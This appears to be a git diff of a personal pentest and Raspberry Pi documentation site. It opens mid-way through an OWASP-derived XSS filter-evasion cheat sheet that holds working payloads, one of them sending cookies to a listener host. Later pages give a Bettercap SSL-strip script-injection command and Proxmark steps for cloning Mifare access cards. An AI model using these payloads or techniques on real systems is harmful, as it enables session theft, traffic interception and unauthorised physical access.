XSS Using HTML Quote Encapsulation This was tested in IE, your mileage may vary. For performing XSS on sites that allow <SCRIPT>
but don't allow <SCRIPT SRC...
by way of a regex filter /\<script\[^\>\]+src/i
:
< script a = ">" src = "httx://xss.rocks/xss.js" ></ script >
+
For performing XSS on sites that allow <SCRIPT>
but don't allow \<script src...
by way of a regex filter /\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\*)src/i
(this is an important one, because I've seen this regex in the wild):
< script =" > " src=" httx : //xss.rocks/xss.js"> </ script >
+
Another XSS to evade the same filter, /\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\*)src/i
:
< SCRIPT a = ">" '' SRC = "httx://xss.rocks/xss.js" ></ SCRIPT >
+
Yet another XSS to evade the same filter, /\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\*)src/i
. I know I said I wasn't going to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow <SCRIPT>
tags but not remote script is a state machine (and of course there are other ways to get around this if they allow <SCRIPT>
tags):
< SCRIPT " a = '>' " SRC = "httx://xss.rocks/xss.js" ></ SCRIPT >
+
And one last XSS attack to evade, /\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\*)src/i
using grave accents (again, doesn't work in Firefox):
< script a = "`" >
+ ` SRC="httx://xss.rocks/xss.js">
+</ script >
+
Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:
< script a = ">'>" src = "httx://xss.rocks/xss.js" ></ script >
+
This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:
< SCRIPT > document . write ( "<SCRI" );</ SCRIPT > PT SRC="httx://xss.rocks/xss.js"></ SCRIPT >
+
URL String Evasion Assuming http://www.google.com/
is programmatically disallowed:
IP Versus Hostname < a href = "http://66.102.7.147/" > XSS</ a >
+
URL Encoding < a href = "http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D" > XSS</ a >
+
DWORD Encoding Note: there are other variations of Dword encoding - see the IP Obfuscation calculator below for more details:
< a href = "http://1113982867/" > XSS</ a >
+
Hex Encoding The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex octet is not required):
< a href = "http://0x42.0x0000066.0x7.0x93/" > XSS</ a >
+
Octal Encoding Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...:
< a href = "http://0102.0146.0007.00000223/" > XSS</ a >
+
Base64 Encoding < img onload = "eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))" />
+
Mixed Encoding Let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:
< a
+ href = "h
+tt p://6 6.000146.0x7.147/"
+ > XSS</ a
+>
+
Protocol Resolution Bypass //
translates to http://
which saves a few more bytes. This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like (ht|f)tp(s)?://
(thanks to Ozh for part of this one). You can also change the //
to \\\\
. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.
< a href = "//www.google.com/" > XSS</ a >
+
Google "feeling lucky" part 1 Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's keyword:
protocol. You can concatenate several keywords by using something like the following keyword:XSS+RSnake
for instance. This no longer works within Firefox as of 2.0.
< a href = "//google" > XSS</ a >
+
Google "feeling lucky" part 2 This uses a very tiny trick that appears to work Firefox only, because of its implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:
< a href = "http://ha.ckers.org@google" > XSS</ a >
+
Google "feeling lucky" part 3 This uses a malformed URL that appears to work in Firefox and Opera only, because of their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"):
< a href = "http://google:ha.ckers.org" > XSS</ a >
+
Removing CNAMEs When combined with the above URL, removing www.
will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly):
< a href = "http://google.com/" > XSS</ a >
+
Extra dot for absolute DNS:
< a href = "http://www.google.com./" > XSS</ a >
+
JavaScript Link Location < a href = "javascript:document.location='http://www.google.com/'" > XSS</ a >
+
Content Replace as Attack Vector Assuming http://www.google.com/
is programmatically replaced with nothing). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (IE: java&\#x09;script:
was converted into java script:
, which renders in IE, Netscape 8.1+ in secure site mode and Opera):
< a href = "http://www.google.com/ogle.com/" > XSS</ a >
+
Assisting XSS with HTTP Parameter Pollution Assume a content sharing flow on a web site is implemented as below. There is a "Content" page which includes some content provided by users and this page also includes a link to "Share" page which enables a user choose their favorite social sharing platform to share it on. Developers HTML encoded the "title" parameter in the "Content" page to prevent against XSS but for some reasons they didn't URL encoded this parameter to prevent from HTTP Parameter Pollution. Finally they decide that since content_type's value is a constant and will always be integer, they didn't encode or validate the content_type in the "Share" page.
Content Page Source Code `a href="/Share?content_type=1& title=< %=Encode.forHtmlAttribute(untrusted content title)%>">Share</ a >
+
Share Page Source Code < script >
+ var contentType = <%= Request . getParameter ( "content_type" ) %> ;
+ var title = "<%=Encode.forJavaScript(request.getParameter(" title "))%>" ;
+ ...
+ //some user agreement and sending to server logic might be here
+ ...
+</ script >
+
Content Page Output In this case if attacker set untrusted content title as “This is a regular title&content_type=1;alert(1)” the link in "Content" page would be this:
< a href = "/share?content_type=1&title=This is a regular title&content_type=1;alert(1)" > Share</ a >
+
Share Page Output And in share page output could be this:
< script >
+ var contentType = 1 ; alert ( 1 );
+ var title = "This is a regular title" ;
+ …
+ //some user agreement and sending to server logic might be here
+ …
+</ script >
+
As a result, in this example the main flaw is trusting the content_type in the "Share" page without proper encoding or validation. HTTP Parameter Pollution could increase impact of the XSS flaw by promoting it from a reflected XSS to a stored XSS.
Character Escape Sequences All the possible combinations of the character "\<" in HTML and JavaScript. Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above.
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
Methods to Bypass WAF – Cross-Site Scripting Stored XSS If an attacker managed to push XSS through the filter, WAF wouldn’t be able to prevent the attack conduction.
Reflected XSS in Javascript Example: <script> ... setTimeout(\\"writetitle()\\",$\_GET\[xss\]) ... </script>
+Exploitation: /?xss=500); alert(document.cookie);//
+
DOM-based XSS Example: <script> ... eval($\_GET\[xss\]); ... </script>
+Exploitation: /?xss=document.cookie
+
XSS via request Redirection ...
+header('Location: '.$_GET['param']);
+...
+
As well as:
..
+header('Refresh: 0; URL='.$_GET['param']);
+...
+
This request will not pass through the WAF: /?param=<javascript:alert(document.cookie>)
This request will pass through the WAF and an XSS attack will be conducted in certain browsers. /?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
WAF ByPass Strings for XSS <Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
<Input value = "XSS" type = text>
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><img src="x:x" onerror="alert(XSS)">
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
On Mouse Over​ <img src="/" =_=" title="onerror='prompt(1)'">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
<form><button formaction=javascript:alert(1)>CLICKME
<input/onmouseover="javaSCRIPT:confirm(1)"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
Filter Bypass Alert Obfuscation (alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
alert?.()
`${alert``}
` (The payload should include leading and trailing backticks.) (alert())
source: OWASP / www-community
Back to top
\ No newline at end of file
diff --git a/penetration-testing/kali-linux/bettercap1.6.2/index.html b/penetration-testing/kali-linux/bettercap1.6.2/index.html
new file mode 100644
index 000000000..ca4956cd9
--- /dev/null
+++ b/penetration-testing/kali-linux/bettercap1.6.2/index.html
@@ -0,0 +1,175 @@
+ Bettercap 1.6.2 Installation - 3os penetration-testing tools Authors: fire1ce | Created: 2021-10-24 | Last update: 2022-08-02 Bettercap 1.6.2 Installation Bettercap 1.6.2 Installation BetterCAP is a powerful, flexible, and portable tool created to perform various types of MITM attacks against a network
Bettercap 1.6.2 is a legacy tool, but it performs SSL strip much better than Bettercap 2.x
Install Ruby Gem
apt install -y ruby-full libpcap-dev
+gem update --system
+gem install bettercap
+
Bettercap 1.6.2 installs the executable to /usr/local/bin/bettercap
Bettercap 2.x installs the executable to /usr/bin/bettercap
Both Bettercap 1.6.2 and 2.x share the same executable name. In order to prevent any collisions we will rename the Bettercap 1.6.2 executable to bettercap1.6.2
.
mv /usr/local/bin/bettercap /usr/local/bin/bettercap1.6.2
+
From this point you can run bettercap1.6.2 for Bettercap 1.6.2
and bettercap for Bettercap 2.x
Bettercap 1.6.2 SSL Strip Examples Basic SSL Strip Example
bettercap1.6.2 -X -T 192 .168.1.104 --proxy
+
SSL Strip With XSS Example
bettercap1.6.2 -X -T 192 .168.3.104 --proxy --proxy-module injectjs --js-data "<script>alert('SSL STRIP, Script Injection')</script>"
+
Debug To find the Bettercap installation from ruby gems:
the path should be under GEM PATH, for example:
/var/lib/gems/2.7.0/gems/bettercap-1.6.2
+
Back to top
\ No newline at end of file
diff --git a/penetration-testing/kali-linux/kali-linux/index.html b/penetration-testing/kali-linux/kali-linux/index.html
new file mode 100644
index 000000000..a075a5b48
--- /dev/null
+++ b/penetration-testing/kali-linux/kali-linux/index.html
@@ -0,0 +1,195 @@
+ Kali Linux - 3os penetration-testing kali-linux kali Kali Linux Minimal Headless Kali Linux installation - Works for Cloud VM Installation (NO GUI) This is a simple guide to install Minimal Headless Kali Linux by converting a Debian Linux to Kali Linux distro without any unnecessary tools. Basically you install the tools you need.
Platforms Minimum Monthly Price DigitalOcean.com 5$ (This link provides 100$ for 60 days)
First of all we will need a clean Debian Linux local or at any cloud provider with ssh access
Let's convert! We will install two packages which allow us to replace Debian's repo with the Kali repo
apt install -y gnupg gnupg2 wget
+
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add
+
rm -rf /etc/apt/sources.list
+
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
+
Now after we replaced the repo to Kali we need to install the Basic Kali Linux core
apt-cache search kali-linux
+
apt install -y kali-linux-core
+
apt-get -y dist-upgrade
+
Reboot the server to complete the conversion process.
In order to test that you are using Kali Linux
Or you can check the contents of the /etc/os-release
file for this Debian distribution. After we got our new Minimal Kali ready we need to clean up some of Debian's leftovers to finish
systemctl stop rpcbind.socket rpcbind smbd
+
systemctl disable rpcbind.socket rpcbind smbd
+
That's It, now we can install any package we need from Kali repo.
Here are some of my personal packages I use daily
apt update && apt install -y \
+curl wget git dnsutils whois net-tools htop locate telnet traceroute \
+dirb wfuzz dirbuster enum4linux gobuster nbtscan nikto nmap \
+onesixtyone oscanner smbclient fern-wifi-cracker crowbar smbmap \
+smtp-user-enum sslscan tnscmd10g whatweb snmpcheck wkhtmltopdf \
+sipvicious seclists wordlists hydra bully netcat-openbsd netcat-traditional \
+adb fastboot realtek-rtl88xxau-dkms docker docker-compose crunch \
+wifite apktool apksigner zipalign default-jre default-jdk man-db \
+screenfetch xsltproc binwalk python3-pip zlib1g-dev python2.7-dev \
+subfinder chrony hcxtools libssl-dev hcxdumptool hashcat hash-identifier \
+libpcap-dev npm sqlmap wpscan exploitdb minicom screen hashid nfs-common
+
Fix SSH Broken Pipe in Kali add this:
Host *
+ IPQoS = throughput
+
Back to top
\ No newline at end of file
diff --git a/penetration-testing/kali-linux/links/index.html b/penetration-testing/kali-linux/links/index.html
new file mode 100644
index 000000000..69fb9edb0
--- /dev/null
+++ b/penetration-testing/kali-linux/links/index.html
@@ -0,0 +1,167 @@
+ Links and Tools - 3os pt tools Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-07-17 Links Description Eicar Files Files With Virus Signature Credit Card Generator PayPal Credit Card Generator - Login Required ipleak.net Displays Information About Your IP mxtoolbox Network Tools Related to DNS jwt.io Allows You to Decode, Verify and Generate Json Web Tokens DNS Dumpster Domain Research Tool That Can Discover Hosts Related to a Domain SSL-Lab Deep Analysis of The Configuration of any SSL Web Server GraphQLmap Engine to interact with a GraphQL endpoint for penetration-testing purposes.
Back to top
\ No newline at end of file
diff --git a/penetration-testing/kali-linux/metasploit/index.html b/penetration-testing/kali-linux/metasploit/index.html
new file mode 100644
index 000000000..185caf098
--- /dev/null
+++ b/penetration-testing/kali-linux/metasploit/index.html
@@ -0,0 +1,172 @@
+ Metasploit Framework - 3os pt tools metasploit Authors: fire1ce | Created: 2021-10-24 | Last update: 2022-08-02 Installation apt install -y metasploit-framework postgresql
+
systemctl enable postgresql
+
systemctl start postgresql
+
Start:
Back to top
\ No newline at end of file
diff --git a/penetration-testing/kali-linux/wifite/index.html b/penetration-testing/kali-linux/wifite/index.html
new file mode 100644
index 000000000..1700aefad
--- /dev/null
+++ b/penetration-testing/kali-linux/wifite/index.html
@@ -0,0 +1,177 @@
+ Wifite - 3os pt tools wifi Authors: fire1ce | Created: 2021-10-24 | Last update: 2022-08-02 Wifite Wifite is an automated wireless attack tool.
Wifite2 Github page
In order to perform wifi attacks you need a wifi card with Monitor Mode
and Frame Injection
like Realtek rtl8812au chipset.
Suggested Wifi Dongles
Install in kali Install Pyrit for Wifite Pyrit Github page
Install dependencies
apt install python zlib openssl git
+
The Install
cd ~
+git clone https://github.com/JPaulMora/Pyrit.git;
+pip install psycopg2 scapy;
+cd Pyrit
+python setup.py clean;
+python setup.py build;
+python setup.py install;
+rm -rf ~/Pyrit
+
Back to top
\ No newline at end of file
diff --git a/penetration-testing/proxmark/about-proxmark/index.html b/penetration-testing/proxmark/about-proxmark/index.html
new file mode 100644
index 000000000..6c84979c7
--- /dev/null
+++ b/penetration-testing/proxmark/about-proxmark/index.html
@@ -0,0 +1,167 @@
+ About Proxmark3 - 3os pt tools rfid Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-11-16 About Proxmark3 The Proxmark is an RFID swiss-army tool, allowing for both high and low level interactions with the vast majority of RFID tags and systems world-wide.
There are a few Proxmark devices, and you can find them at the official website. I personally use the device in the picture above, you can get one at
it's cheap and suits my needs
The RFID tags I use are dual band tags 13.56MHz and 125KHz
Useful Links:
Back to top
\ No newline at end of file
diff --git a/penetration-testing/proxmark/cheatsheet/index.html b/penetration-testing/proxmark/cheatsheet/index.html
new file mode 100644
index 000000000..c8684c754
--- /dev/null
+++ b/penetration-testing/proxmark/cheatsheet/index.html
@@ -0,0 +1,167 @@
+ Proxmark3 CheatSheet - 3os pt tools rfid Authors: fire1ce | Created: 2021-09-12 | Last update: 2022-08-02 Proxmark3 CheatSheet Basics Command Description hf search Identify High Frequency cards lf search Identify Low Frequency cards hw tune Measure antenna characteristics, LF/HF voltage should be around 20-45+ V hw version Check version hw status Check overall status
Back to top
\ No newline at end of file
diff --git a/penetration-testing/proxmark/mifare-tags/index.html b/penetration-testing/proxmark/mifare-tags/index.html
new file mode 100644
index 000000000..567deb218
--- /dev/null
+++ b/penetration-testing/proxmark/mifare-tags/index.html
@@ -0,0 +1,222 @@
+ Mifare Classic 1K ISO14443A - 3os pt tools rfid Authors: fire1ce | Created: 2023-06-20 | Last update: 2023-06-20 Clone Mifare Classic 1K ISO14443A Which results in a response along the lines of:
#db# DownloadFPGA(len: 42096)
+ UID : de 0f 3d cd
+ATQA : 00 04
+ SAK : 08 [ 2 ]
+TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
+proprietary non iso14443-4 card found, RATS not supported
+No chinese magic backdoor command detected
+Prng detection: HARDENED ( hardnested)
+Valid ISO14443A Tag Found - Quiting Search
+
As we can see the output ISO14443A Tag Found
it's Mifare 1k
card.
This also shows us the UID de0f3dcd
of the card, which we’ll need later.
Find and Extract the 32 Keys From The Mifare ISO14443A From there we can find keys in use by checking against a list of default keys (hopefully one of these has been used)
proxmark3> hf mf chk * ?
+
This should show us the key we require looking something like
No key specified, trying default keys
+chk default key[ 0 ] ffffffffffff
+chk default key[ 1 ] 000000000000
+chk default key[ 2 ] a0a1a2a3a4a5
+chk default key[ 3 ] b0b1b2b3b4b5
+chk default key[ 4 ] aabbccddeeff
+chk default key[ 5 ] 4d3a99c351dd
+chk default key[ 6 ] 1a982c7e459a
+chk default key[ 7 ] d3f7d3f7d3f7
+chk default key[ 8 ] 714c5c886e97
+chk default key[ 9 ] 587ee5f9350f
+chk default key[ 10 ] a0478cc39091
+chk default key[ 11 ] 533cb6c723f6
+chk default key[ 12 ] 8fd0a4f256e9
+--sector: 0 , block: 3 , key type:A, key count:13
+Found valid key:[ ffffffffffff]
+ ...omitted for brevity...
+--sector:15, block: 63 , key type:B, key count:13
+Found valid key:[ ffffffffffff]
+
If you see Found valid key :[ffffffffffff]
This shows a key of ffffffffffff
, which we can plug into the next command, which dumps keys to file dumpkeys.bin
.
proxmark3> hf mf nested 1 0 A ffffffffffff d
+
If you see a table like this in the output without a valid key
| ---| ----------------| ---| ----------------| ---|
+| sec| key A | res| key B | res|
+| ---| ----------------| ---| ----------------| ---|
+| 000 | a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |
+| 001 | ffffffffffff | 0 | ffffffffffff | 0 |
+| 002 | a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |
+| 003 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 004 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 005 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 006 | ffffffffffff | 1 | ffffffffffff | 0 |
+| 007 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 008 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 009 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 010 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 011 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 012 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 013 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 014 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 015 | ffffffffffff | 1 | ffffffffffff | 1 |
+| ---| ----------------| ---| ----------------| ---|
+
In this case use 002
key like this
proxmark3> hf mf nested 1 0 A a0a1a2a3a4a5 d
+
Now you should be able to dump the contents of the 32 keys from the original card. This dumps data from the card into dumpdata.bin
Clone Mifare ISO14443A Using The Dumped Keys At this point we’ve got everything we need from the card, we can take it off the reader.
To copy that data onto a new card, place the (Chinese backdoor) card on the Proxmark .
This restores the dumped data onto the new card. Now we just need to give the card the UID we got from the original hf search command
proxmark3> hf mf restore 1
+
Copy the UID of the original card de0f3dcd
proxmark3> hf mf csetuid de0f3dcd
+
We’re done.
Back to top
\ No newline at end of file
diff --git a/penetration-testing/utilities/clickjacking/index.html b/penetration-testing/utilities/clickjacking/index.html
new file mode 100644
index 000000000..647778ec2
--- /dev/null
+++ b/penetration-testing/utilities/clickjacking/index.html
@@ -0,0 +1,167 @@
+ Clickjacking Test Page - 3os
\ No newline at end of file
diff --git a/penetration-testing/utilities/idd-generator/index.html b/penetration-testing/utilities/idd-generator/index.html
new file mode 100644
index 000000000..50ceab955
--- /dev/null
+++ b/penetration-testing/utilities/idd-generator/index.html
@@ -0,0 +1,167 @@
+ IID Generator & Validator - 3os pt tools IID Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 IID Generator & Validator
Description This is a simple Java Script tool to validate or generate a random Israel's ID number.
Credit & Sources The code was built by Georgy Bunin and cloned from his repository . It was slightly modified to fit this website.
Back to top
\ No newline at end of file
diff --git a/psd-src/3os-preview.png b/psd-src/3os-preview.png
new file mode 100644
index 000000000..a30ee7634
Binary files /dev/null and b/psd-src/3os-preview.png differ
diff --git a/psd-src/3os-preview.psd b/psd-src/3os-preview.psd
new file mode 100644
index 000000000..068e48695
Binary files /dev/null and b/psd-src/3os-preview.psd differ
diff --git a/psd-src/3os-preview_v2.psd b/psd-src/3os-preview_v2.psd
new file mode 100644
index 000000000..94dd41344
Binary files /dev/null and b/psd-src/3os-preview_v2.psd differ
diff --git a/raspberry-pi/docker-raspberrypi/index.html b/raspberry-pi/docker-raspberrypi/index.html
new file mode 100644
index 000000000..fc77ff96a
--- /dev/null
+++ b/raspberry-pi/docker-raspberrypi/index.html
@@ -0,0 +1,173 @@
+ Docker on Raspberry Pi - 3os docker raspberry-pi docker-compose Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-24 Docker and Docker-compose on Raspberry Pi How to install docker on Raspberry Pi sudo apt install -y docker.io
+
Running Docker as root sudo usermod -aG docker pi
+
Manage Docker as a non-root user The Docker daemon binds to a Unix socket instead of a TCP port. By default that Unix socket is owned by the user root and other users can only access it using sudo. The Docker daemon always runs as the root user.
If you don’t want to preface the docker command with sudo, create a Unix group called docker and add users to it. When the Docker daemon starts, it creates a Unix socket accessible by members of the docker group.
The docker group grants privileges equivalent to the root user.
sudo groupadd docker
+sudo usermod -aG docker $USER
+newgrp docker
+
How to install docker-compose on Raspberry Pi sudo apt install docker-compose
+
Back to top
\ No newline at end of file
diff --git a/raspberry-pi/external-power-button/index.html b/raspberry-pi/external-power-button/index.html
new file mode 100644
index 000000000..faddb14d9
--- /dev/null
+++ b/raspberry-pi/external-power-button/index.html
@@ -0,0 +1,171 @@
+ External Power Button - 3os raspberry-pi Authors: fire1ce | Created: 2022-04-24 | Last update: 2022-04-24 Python script to control Raspberry Pi with external power button - Wake/Power Off/Restart(Double Press)
Official Github Repo
When Raspberry Pi is powered off, shortening GPIO3 (Pin 5) to ground will wake the Raspberry Pi.
This script uses pin GPIO3(5), Ground(6) with momentary button.
Requirements Can be installed via apt
sudo apt install python3-gpiozero
+
Install This will install the script as service
and it will run at boot
curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-power-button/main/install.sh | bash
+
Uninstall curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-power-button/main/uninstall.sh | bash
+
Default Behavior Button Press (Raspberry Pi is ON) Behavior Single Nothing Double Reboot Long press and releases (above 3 seconds) Power off
Button Press (Raspberry Pi is OFF) Behavior Single Power On
Check if service is running sudo systemctl status power_button.service
+
Back to top
\ No newline at end of file
diff --git a/raspberry-pi/guides/3g-modem-host/index.html b/raspberry-pi/guides/3g-modem-host/index.html
new file mode 100644
index 000000000..78fbb362a
--- /dev/null
+++ b/raspberry-pi/guides/3g-modem-host/index.html
@@ -0,0 +1,214 @@
+ 3g Modem Host Configuration - 3os raspberry-pi 3g-modem Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 3g Modem Host Configuration Install ubuntu server for raspberrypi using Raspberry Pi Imager {}
Packages Installation apt install -y ppp curl wget git dnsutils whois net-tools htop gcc libusb-1.0-0-dev iptables-persistent isc-dhcp-server
+
After the install add a symlink
ln -s /usr/include/libusb-1.0/libusb.h /usr/include/libusb.h
+
sakis3g Script Installation Clone, Compile, and copy to /usr/bin/
git clone https://github.com/Trixarian/sakis3g-source.git
+cd sakis3g-source
+./compile
+cp build/sakis3gz /usr/bin/sakis3g
+
Create new script for auto connect
nano /usr/bin/sakis3gConnect.sh
+
interactive connect (for testing) bash sakis3g --interactive
Copy the following
#!/bin/bash
+
+/usr/bin/sakis3g start USBINTERFACE = "5" APN = "vob3g" APN_USER = " " APN_PASS = " "
+
When APN credentials are empty, APN_USER and APN_PASS should be a string with a space
Add executable permissions
chmod +x sakis3gConnect.sh
+
Run the script sakis3gConnect.sh
You should have a new interface ppp0
Configuring DHCP Server !! info The following configuration assumes use of eth0 interface for the DHCP
Edit
nano /etc/default/isc-dhcp-server
+
Add the following to the end of the config
INTERFACESv4 = "eth0"
+INTERFACESv6 = "eth0"
+
Edit
nano /etc/dhcp/dhcpd.conf
+
Change the following options to (you can choose the name servers you use):
option domain-name "local" ;
+option domain-name-servers 8 .8.8.8;
+default-lease-time 600 ;
+max-lease-time 7200 ;
+ddns-update-style none;
+authoritative;
+
Append the DHCP Network config to the end of the file (Change for your need):
subnet 192 .168.20.0 netmask 255 .255.255.0 {
+ range 192 .168.20.5 192 .168.20.30;
+ option routers 192 .168.20.1;
+ option domain-name-servers 8 .8.8.8, 8 .8.4.4;
+}
+
Save & Exit
run
echo 1 > /proc/sys/net/ipv4/ip_forward
+
Edit
Change the following option
Restart and Test
service isc-dhcp-server restart
+service isc-dhcp-server status
+
edit:
/etc/netplan/50-cloud-init.yaml
+
network:
+ ethernets:
+ eth0:
+ addresses: [ 192 .168.20.1/24]
+ gateway4: 192 .168.20.1
+ nameservers:
+ addresses: [ 1 .1.1.1, 8 .8.8.8]
+ version: 2
+
After reboot you should connect to the new static IP
Let's route all the traffic to the new interface with Iptables iptables -F
+iptables --table nat --append POSTROUTING --out-interface ppp0 -j MASQUERADE
+iptables --append FORWARD --in-interface eth0 -j ACCEPT
+
Save the rules
iptables-save > /etc/iptables/rules.v4
+ip6tables-save > /etc/iptables/rules.v6
+
Cron examples @reboot sleep 20 && /usr/bin/sakis3gConnect.sh
+*/5 * * * * /usr/bin/sakis3gConnect.sh
+
Back to top
\ No newline at end of file
diff --git a/raspberry-pi/motion-sensor-display-control/index.html b/raspberry-pi/motion-sensor-display-control/index.html
new file mode 100644
index 000000000..ada33acc1
--- /dev/null
+++ b/raspberry-pi/motion-sensor-display-control/index.html
@@ -0,0 +1,177 @@
+ Motion Sensor Display Control - 3os raspberry-pi motion-sensor automation Authors: fire1ce | Created: 2022-04-24 | Last update: 2022-07-13 Motion Sensor Display Control Python script to control connected display to Raspberry Pi using Motion Sensor (pir).
Official Github Repo
This script uses pin GPIO4(7) to read data from Motion (PIR) Sensor, Any 5v and ground for PIR Sensor
Requirements Can be installed via apt
sudo apt install python3-gpiozero
+
Install This will install the script as service
and it will run at boot
curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-pir-motion-display-control/main/install.sh | bash
+
Uninstall curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-pir-motion-display-control/main/uninstall.sh | bash
+
Default Behavior Condition Behavior Motion while display is off Turns on display for 60 sec Motion while display is on Resets the timer for another 60 sec No motion > 60 sec Turns off the display
Config File
/usr/local/bin/motion-display-control.py
+
You can change Data Pin of the PIR Sensor at gpio_pin value You can change Delay at display_delay value
Line
motion = Motion ( gpio_pin = 4 , display_delay = 60 , verbose = False )
+
Restart the service to apply changes
sudo systemctl restart power_button.service
+
Debug In order to allow verbose debug change the following
File
/usr/local/bin/motion-display-control.py
+
Line
Set verbose value to True
motion = Motion ( gpio_pin = 4 , display_delay = 60 , verbose = True )
+
Restart the service to apply changes
sudo systemctl restart motion-display-control.service
+
Check if service is running sudo systemctl status motion-display-control.service
+
Contributors Thanks to Boris Berman for the script rewrite from function to classes
Back to top
\ No newline at end of file
diff --git a/raspberry-pi/projects/magic-mirror-v2/index.html b/raspberry-pi/projects/magic-mirror-v2/index.html
new file mode 100644
index 000000000..ed78eb0fc
--- /dev/null
+++ b/raspberry-pi/projects/magic-mirror-v2/index.html
@@ -0,0 +1,199 @@
+ Magic Mirror 2.0 - 3os raspberry-pi magicmirror Authors: fire1ce | Created: 2022-04-24 | Last update: 2022-07-13 Magic Mirror 2.0
To be honest, it's not my first time building a Magic Mirror project. My first magicmirror can be found here . The Magic Mirror 2.0 is based on Raspberry Pi 4 with Docker Container.
References magicmirror.builders official website. khassel's magicmirror docker image documentation website.
The Build Process I had a dead iMac 2011 27" with a 2k display. I've managed to use its LCD panel with this product from AliExpress. It's actually a full controller for the specific LCD panel, including the inverter for backlight. Basically, it's a full-fledged LCD Monitor with HDMI we need for the Raspberry Pi 4 .
